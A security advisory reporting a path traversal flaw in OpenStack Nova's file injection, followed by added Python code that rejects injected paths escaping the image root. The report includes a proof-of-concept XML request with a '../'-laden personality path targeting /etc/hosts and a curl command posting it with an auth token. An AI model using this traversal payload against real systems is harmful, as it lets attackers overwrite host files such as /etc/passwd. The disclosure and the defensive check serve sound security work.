Mathias Weckbecker from SUSE Security Team reported the following:
------------------
During our internal security audit efforts at SUSE for openstack, I have found an issue in openstack-nova (compute).
Quoting from [1] (comment #1):
Vulnerable code (quoted), /usr/lib64/python2.6/site-packages/nova/utils.py: [... snipped copy of utils.execute code ...]
It's already doing lots of things correctly, like e.g. calling Popen with the first parameter being a list, still it is affected by traversal flaws.
Testcase (also from [1], comment #0):
mweckbecker@s3gfault:~$ cat newserver.xml
<?xml version="1.0" encoding="UTF-8"?>
<server xmlns="http://docs.openstack.org/compute/api/v1.1"
        imageRef="http://anonymi.arch.suse.de:8774/985b88ae99474d6d90501870499a063f/images/2d583dfb-000a-4332-9264-ed57ce186f1d"
        flavorRef="6"
        name="new-server-test">
  <metadata>
    <meta key="My Server Name">foobar</meta>
  </metadata>
  <personality>
    <file path="../../../../../../../../../../../../../etc/hosts">
      ICAgICAgDQoiQSBjbG91ZCBkb2VzIG5vdCBrbm93IHdoeSBp
      dCBtb3ZlcyBpbiBqdXN0IHN1Y2ggYSBkaXJlY3Rpb24gYW5k
      IGF0IHN1Y2ggYSBzcGVlZC4uLkl0IGZlZWxzIGFuIGltcHVs
      c2lvbi4uLnRoaXMgaXMgdGhlIHBsYWNlIHRvIGdvIG5vdy4g
      QnV0IHRoZSBza3kga25vd3MgdGhlIHJlYXNvbnMgYW5kIHRo
      ZSBwYXR0ZXJucyBiZWhpbmQgYWxsIGNsb3VkcywgYW5kIHlv
      dSB3aWxsIGtub3csIHRvbywgd2hlbiB5b3UgbGlmdCB5b3Vy
      c2VsZiBoaWdoIGVub3VnaCB0byBzZWUgYmV5b25kIGhvcml6
      b25zLiINCg0KLVJpY2hhcmQgQmFjaA==
    </file>
  </personality>
</server>
mweckbecker@s3gfault:~$ curl -v "http://anonymi.arch.suse.de:8774/v2/985b88ae99474d6d90501870499a063f/servers" -H"X-Auth-Token:ef7d5faf9d864c048afce0cf6a3a3c15" -H"Content-type:application/xml" -H"Accept:application/xml" -d @newserver.xml
Additional note: This beast is calling tee with sudo, potentially allowing attackers to even alter files such as /etc/passwd.
[1] https://bugzilla.novell.com/show_bug.cgi?id=767687
Thanks, Matthias
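A containment check for the injected-file path described in the report, as an added example (it is not code from Nova or from the report). The names `join_within_root`, `PathEscapesRoot` and `check_samples` are hypothetical, a temporary directory stands in for the mounted guest image, and Python 3 is assumed.

```python
import os
import tempfile

# Path attribute copied from the <file> element in the test case above
TESTCASE_PATH = "../../../../../../../../../../../../../etc/hosts"


class PathEscapesRoot(ValueError):
    """Raised when an injected path resolves outside the image root."""


def join_within_root(root, *untrusted_parts):
    """Join untrusted path parts under root and return the resolved path.

    Leading slashes are stripped so "/etc/hosts" means <root>/etc/hosts.
    realpath() collapses ".." and follows symlinks that already exist,
    so a link planted inside the image cannot redirect the write either.
    """
    root_real = os.path.realpath(root)
    candidate = os.path.realpath(
        os.path.join(root_real, *[p.lstrip("/") for p in untrusted_parts]))
    # commonpath avoids the "/mnt/img" vs "/mnt/img-evil" prefix mistake
    if os.path.commonpath([root_real, candidate]) != root_real:
        raise PathEscapesRoot("%r resolves outside %r" % (untrusted_parts, root))
    return candidate


def check_samples():
    """Run the check over constructed sample paths; returns {path: verdict}."""
    results = {}
    with tempfile.TemporaryDirectory() as root:  # stands in for the mounted image
        os.makedirs(os.path.join(root, "etc"))
        # constructed: symlink inside the image pointing at the host's /etc
        os.symlink("/etc", os.path.join(root, "hostetc"))
        samples = ["/etc/hosts",            # ordinary personality path
                   TESTCASE_PATH,           # traversal from the test case
                   "etc/../../etc/passwd",  # traversal after a valid prefix
                   "hostetc/passwd"]        # escape through a symlink
        for path in samples:
            try:
                join_within_root(root, path)
                results[path] = "allowed"
            except PathEscapesRoot:
                results[path] = "rejected"
    return results


if __name__ == "__main__":
    for path, verdict in check_samples().items():
        print("%-50s %s" % (path, verdict))
```

The check has to run before the privileged write, and if the image tree is only readable as root, the path resolution has to be done with the same privileges as that write.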